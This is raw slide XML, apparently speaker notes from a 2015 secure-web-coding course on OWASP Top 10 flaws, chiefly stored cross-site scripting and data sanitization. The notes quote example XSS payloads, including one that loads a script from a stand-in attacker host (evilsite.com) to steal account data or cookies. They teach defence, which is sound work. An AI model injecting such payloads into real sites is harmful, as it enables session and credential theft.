              <a:t>Also – the vulnerability identifiers (A1-A10) shown in the following pages are taken from the 2013 list (previous foil) – so “A6”  refers to “Sensitive Data Exposure”(2013 rank), and –not– “insecure cryptographic storage”, as in 2010, etc.</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354008209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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23355473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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27051048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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44976504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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188789155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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26808934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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25182188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20B865-30AA-490B-91EC-B55FD200A00E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1218840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Proper data validation/sanitization can eliminate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> many of the most common web site vulnerabilities, and knocks off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>MOST OF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>3 of the “Top 10”  problems (there are some additional techniques that can cause CSRF, for example, so sanitization will not completely eradicate this problem – but will go a long way to reducing the exposure).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So we’ll start with sanitization, and knock off (most of) 3 of the common problems at one go…</a:t>
            </a:r>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134289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what can happen if you DON’T sanitize incoming (from ANY source) data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Example 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A web site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that requires registration has a page that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>displays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> member’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> names/addresses/emails  (likely in addition to other info)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> from the membership database, so that you can collaborate (or conspire, depending upon the nature of the web site…) with other members.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There was a “registration form” that you to filled out when you joined the site. You entered into the “address” field of that form the following text: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>“4321 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Blastofff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Blvd.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And this address is added to the web site’s user database “as-is” (via, say, a parameterized SQL query). This data might be retrieved from the database and formatted like this (along with other data) by the member display page:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>HTML:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;span class=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>addressblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;4321 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Blastofff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Blvd.&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> there will likely be more – in fact, much more – HTML for an actual display item. For example,  this item may be enclosed in a table data item, which is enclosed  in a table row, which is enclosed in a table, which may be enclosed in yet another table, or a div, etc. – this is just the “bare minimum” HTML pertaining to the address display)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Example 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>What if an attacker provides a “bogus” registration, and instead entered this into the address field of the registration form: “&lt;/span&gt;&lt;script&gt;alert("U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hazz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> bin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hakkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>");&lt;/script&gt;&lt;span&gt;” (without the quotes, of course…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In this case, the HTML used to display the address will  instead be (because we didn’t sanitize the data EVEN THOUGH we used parameterized SQL to add the data to the membership database):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>HTML:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>&lt;span class=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>addressblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" baseline="0" dirty="0" smtClean="0"/>
              <a:t>&lt;/span&gt;&lt;script&gt;alert("U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hazz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" baseline="0" dirty="0" smtClean="0"/>
              <a:t> bin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>hakkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" baseline="0" dirty="0" smtClean="0"/>
              <a:t>");&lt;/script&gt;&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" baseline="0" dirty="0" smtClean="0"/>
              <a:t>&lt;/span&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or worse, if the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> had entered: “&lt;/span&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="//evilsite.com/get$$$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;&lt;/script&gt;&lt;span&gt;”, the display code would be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>HTML:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;span class=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>addressblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;/span&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>="//evilsite.com/get$$$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>"&gt;&lt;/script&gt;&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When the browser encounters this HTML that displays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the attacker’s “address” as saved in the database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“get$$$” script from the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> attacker’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> website will run, and get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for the attacker all of your $$$ (or account info, or cookies, or whatever else the attacker is after or can get away with…).  With this technique, the attacker can inject a virtually unlimited amount of JavaScript into the web page of anyone displaying this record. And if the person displaying this record has super user/admin authority, so does this JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is an example of “stored XSS”, also called “permanent XSS”. (video: https://www.youtube.com/watch?v=_Z9RQSnf8-g&amp;index=3&amp;list=PL8239DA448CC2BB7C )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that this happens EVEN THOUGH parameterized queries were used to insert the “address” into the database. When the display program retrieves this data, and sends it to the browser, the attacker is  “in”.  And if the user displaying this record has admin authority, virtually ANYTHING can be done. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So parameterized SQL – while good and desirable for many reasons (later) – is INSUFFICIENT to mitigate XSS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Earlier I noted that there may be other HTML used to implement  the display of the membership data (tables, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>divs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>). If this is the case, the attacker may have to alter the “customized attack address” so that it completes (or nullifies) any such markup items so that the browser will execute the script.  Obviously, if the original display item didn’t use &lt;span&gt;, the attacker-crafted address shown above shouldn’t “close” the span, then invoke the script, then open another &lt;span&gt; to pair up with the original HTML closing span entity, etc.  So some engineering is required to craft the exploit so that it fits “correctly” within the existing HTML on the display page. But it’s not rocket science…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The point here is that EVEN IF you use parameterized SQL (which will protect you from SQL injection, if done properly), you STILL need to sanitize the data before adding it to the database… which leads to the next point…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Proper sanitization can be more complicated than expected, with several corner cases (like “escaping escapes”, etc.).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>See: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet for some considerations regarding sanitization. (and more coming up next…)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1231862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can’t be positive that the all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>data that you are about to display is “clean”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even if you meticulously sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> all incoming data before adding it to your database, your database can STILL contain “problematic” data. The data you are about to display may have been added to the database before you cleaned up your input-side validation. So some old, “pre-sanitization era” data could still be out there…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Or, the data may have been entered into the database via some other means than your program, and therefore has not been sanitized at all. Programs like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Phpmyadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Adminer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, SQL Web Data Administrator, and many others, allow direct, “free form”  insert/edit/delete processing on pretty much any database. Without using your validation/sanitization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Attackers can use proxies to avoid client side sanitization efforts, so if you don’t perform sanitization on the server, the attacker can still have her way with your database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The data may have been copied/merged into your database from another system that does a poor job of sanitization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Etc..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The bottom line is (as always…) you can’t trust that the data is safe, so do something to protect yourself. And your fellow Ohioans. Both for incoming and outgoing data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Also, remember that you’re NOT being paranoid if somebody IS ACTUALLY out to get you. And there are attackers waiting to do just that.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20B865-30AA-490B-91EC-B55FD200A00E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1969998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5F0A67-E8B2-4E86-ACDA-A01310B59564}"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153F6-35A1-4D52-A625-852555C331CC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4047576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915F0A67-E8B2-4E86-ACDA-A01310B59564}"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153F6-35A1-4D52-A625-852555C331CC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>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9367" y="2695472"/>
            <a:ext cx="1905266" cy="1467055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1752600"/>
            <a:ext cx="81534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65333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F0A67-E8B2-4E86-ACDA-A01310B59564}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/31/2015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153F6-35A1-4D52-A625-852555C331CC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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3737" y="6324600"/>
            <a:ext cx="2651765" cy="408433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172464322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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.howsmyssl.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2013-Top_10" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/ssltest/viewMyClient.html"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s://www.youtube.com/watch?v=CDbWvEwBBxo&amp;list=PL8239DA448CC2BB7C" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sslcheck.casecurity.org/en_US" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.telerik.com/fiddler" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.msdn.com/b/codeanalysis/archive/2010/07/26/fxcop-10-0-is-available.aspx"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www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/standards.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Validation_Documentation" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/projects/best-practices/"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hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3schools.com/tags/att_input_autocomplete.asp" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Education_Presentation" 